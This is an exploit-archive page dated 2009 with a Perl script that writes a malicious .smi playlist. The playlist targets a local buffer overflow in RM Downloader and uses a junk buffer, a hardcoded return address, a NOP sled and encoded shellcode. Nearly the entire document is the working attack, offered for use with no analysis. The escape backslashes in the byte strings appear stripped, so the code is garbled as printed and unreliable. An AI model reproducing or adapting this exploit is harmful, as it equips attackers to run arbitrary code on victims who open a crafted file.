RM Downloader (.smi File) Universal Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RM Downloader (.smi File) Universal Local Buffer Overflow Exploit
# Published : 2009-05-01
# Author : Stack
# Previous Title : Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3
# Next Title : Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

#!/usr/bin/perl
# RM Downloader (.smi File) Universal Overflow Exploit
use strict;
use warnings;
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x4b".
"x1dxa3xb6x83xebxfcxe2xf4xb7xf5xe7xb6x4bx1dx28xf3".
"x77x96xdfxb3x33x1cx4cx3dx04x05x28xe9x6bx1cx48xff".
"xc0x29x28xb7xa5x2cx63x2fxe7x99x63xc2x4cxdcx69xbb".
"x4axdfx48x42x70x49x87xb2x3exf8x28xe9x6fx1cx48xd0".
"xc0x11xe8x3dx14x01xa2x5dxc0x01x28xb7xa0x94xffx92".
"x4fxdex92x76x2fx96xe3x86xcexddxdbxbaxc0x5dxafx3d".
"x3bx01x0ex3dx23x15x48xbfxc0x9dx13xb6x4bx1dx28xde".
"x77x42x92x40x2bx4bx2ax4exc8xddxd8xe6x23xedx29xb2".
"x14x75x3bx48xc1x13xf4x49xacx7exc2xdax28x1dxa3xb6";
my $junk = "x41" x 26076;
my $eip  = "x17x48xF8x01"; # Universall Ret Adress
my $nops = "x90" x 24;
open(my $playlist, "> spl.smi");
print $playlist
                    $junk.$eip.$nops.$shellcode.$junk.
                    "rn";
close $playlist;

# www.Syue.com [2009-05-01]